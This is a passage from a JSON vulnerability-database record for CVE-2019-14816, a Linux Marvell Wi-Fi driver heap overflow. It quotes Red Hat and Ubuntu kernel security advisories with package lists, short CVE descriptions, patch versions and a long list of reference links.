64le.rpm\nkernel-debug-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1062.12.1.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-devel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-headers-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1062.12.1.el7.s390x.rpm\nperf-3.10.0-1062.12.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\npython-perf-3.10.0-1062.12.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14816\nhttps://access.redhat.com/security/cve/CVE-2019-14895\nhttps://access.redhat.com/security/cve/CVE-2019-14898\nhttps://access.redhat.com/security/cve/CVE-2019-14901\nhttps://access.redhat.com/security/cve/CVE-2019-17133\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXjnG/NzjgjWX9erEAQiZpA/+PrziwQc9nitsDyWqtq556llAnWG2YjEK\nkzbq/d3Vp+7i0aaOHXNG9b6XDgR8kPSLnb/2tCUBQKmLeWEptgY6s24mXXkiAHry\nplZ40Xlmca9cjPQCSET7IkQyHlYcUsc9orUT3g1PsZ0uOxPQZ1ivB1utn6nyhbSg\n9Az/e/9ai7R++mv4zJ7UDrDzuGPv5SOtyIcfuUyYdbuZO9OrmFsbWCRwG+cVvXJ6\nq6uXlIpcWx4H7key9SiboU/VSXXPQ0E5vv1A72biDgCXhm2kYWEJXSwlLH2jJJo7\nDfujB4+NSnDVp7Qu0aF/YsEiR9JQfGOOrfuNsmOSdK3Bx3p8LkS4Fd9y3H/fCwjI\nEOoXerSgeGjB5E/DtH24HKu1FB5ZniDJP69itCIONokq6BltVZsQRvZxpXQdmvpz\nhTJIkYqnuvrkv2liCc8Dr7P7EK0SBPhwhmcBMcAcPHE8BbOtEkcGzF2f2/p/CQci\nN0c4UhB2p+eSLq+W4qG4W/ZyyUh2oYdvPjPCrziT1qHOR4ilw9fH9b+jCxmAM7Lh\nwqj3yMR9YhUrEBRUUokA/wjggmI88u6I8uQatbf6Keqj1v1CykMKF3AEC5qfxwGz\nhk0YzSh0YK6DfybzNxcZK/skcp0Ga0vD+El/nXFI0WGXB8LsQiOUBgfp1JyAlXT6\nIwzrfQ6EsXE=\n=mofI\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nEnhancement(s):\n\n* Selective backport: perf: Sync with upstream v4.16 (BZ#1782748)\n\n4. Please note that the RDS protocol is blacklisted in Ubuntu by\ndefault. =========================================================================\nUbuntu Security Notice USN-4163-2\nOctober 23, 2019\n\nlinux-lts-xenial, linux-aws vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 ESM. \n\nIt was discovered that a race condition existed in the ARC EMAC ethernet\ndriver for the Linux kernel, resulting in a use-after-free vulnerability. \nAn attacker could use this to cause a denial of service (system crash). \n(CVE-2016-10906)\n\nIt was discovered that a race condition existed in the Serial Attached SCSI\n(SAS) implementation in the Linux kernel when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(kernel deadlock). (CVE-2017-18232)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. \n(CVE-2018-21008)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14814,\nCVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel did not properly validate device meta data. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-15117)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel improperly performed recursion while handling device meta\ndata. A physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15118)\n\nIt was discovered that the Technisat DVB-S/S2 USB device driver in the\nLinux kernel contained a buffer overread. A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexpose sensitive information. (CVE-2019-15505)\n\nBrad Spengler discovered that a Spectre mitigation was improperly\nimplemented in the ptrace susbsystem of the Linux kernel. A local attacker\ncould possibly use this to expose sensitive information. (CVE-2019-15902)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  linux-image-4.4.0-1056-aws      4.4.0-1056.60\n  linux-image-4.4.0-166-generic   4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-generic-lpae  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-lowlatency  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-powerpc-e500mc  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-powerpc-smp  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-powerpc64-emb  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-powerpc64-smp  4.4.0-166.195~14.04.1\n  linux-image-aws                 4.4.0.1056.57\n  linux-image-generic-lpae-lts-xenial  4.4.0.166.145\n  linux-image-generic-lts-xenial  4.4.0.166.145\n  linux-image-lowlatency-lts-xenial  4.4.0.166.145\n  linux-image-powerpc-e500mc-lts-xenial  4.4.0.166.145\n  linux-image-powerpc-smp-lts-xenial  4.4.0.166.145\n  linux-image-powerpc64-emb-lts-xenial  4.4.0.166.145\n  linux-image-powerpc64-smp-lts-xenial  4.4.0.166.145\n  linux-image-virtual-lts-xenial  4.4.0.166.145\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() [kernel-rt]\n(BZ#1772522)\n\n* kernel-rt: update to the RHEL7.7.z batch#4 source tree (BZ#1780322)\n\n* kvm nx_huge_pages_recovery_ratio=0 is needed to meet KVM-RT low latency\nrequirement (BZ#1781157)\n\n* kernel-rt:  hard lockup panic in during execution of CFS bandwidth period\ntimer (BZ#1788057)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      },
      {
        "db": "PACKETSTORM",
        "id": "156020"
      },
      {
        "db": "PACKETSTORM",
        "id": "157042"
      },
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154946"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-14816",
        "trust": 2.5
      },
      {
        "db": "PACKETSTORM",
        "id": "155212",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "154951",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/08/28/1",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "156020",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "154897",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156216",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156608",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "157140",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0415",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3817",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1172",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4252",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3570",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0790",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3064",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0766",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3897",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3835",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1248",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "157042",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156213",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156603",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154934",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154946",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154935",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "156020"
      },
      {
        "db": "PACKETSTORM",
        "id": "157042"
      },
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154946"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "id": "VAR-201909-1526",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.30555555
  },
  "last_update_date": "2026-03-09T20:55:45.836000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Linux kernel Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=97659"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-122",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 3.2,
        "url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
      },
      {
        "trust": 2.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-14816"
      },
      {
        "trust": 2.3,
        "url": "https://access.redhat.com/errata/rhsa-2020:0374"
      },
      {
        "trust": 2.2,
        "url": "https://usn.ubuntu.com/4157-1/"
      },
      {
        "trust": 2.2,
        "url": "https://access.redhat.com/errata/rhsa-2020:0339"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0174"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0661"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0375"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4163-2/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4162-1/"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:0328"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
      },
      {
        "trust": 1.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:0204"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:0664"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4163-1/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4162-2/"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14816"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/bugtraq/2019/nov/11"
      },
      {
        "trust": 1.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4157-2/"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:0653"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:1266"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1744149"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:1353"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
      },
      {
        "trust": 0.6,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7caac62ed598a196d6ddf8d9c121e12e082cac3a"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:1347"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192658-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192651-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192424-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192414-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192412-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192648-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156608/red-hat-security-advisory-2020-0664-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-buffer-overflow-via-net-wireless-marvell-mwifiex-30180"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3570/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1248/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0415/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/157140/red-hat-security-advisory-2020-1347-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3835/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156020/red-hat-security-advisory-2020-0174-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3817/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0790/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/154897/ubuntu-security-notice-usn-4157-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156216/red-hat-security-advisory-2020-0375-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1172/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3897/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3064/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-17133"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15902"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14895"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-14895"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14901"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14901"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4163-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/solutions/3523601"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-3693"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-18559"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3846"
      },
      {
        "trust": 0.1,
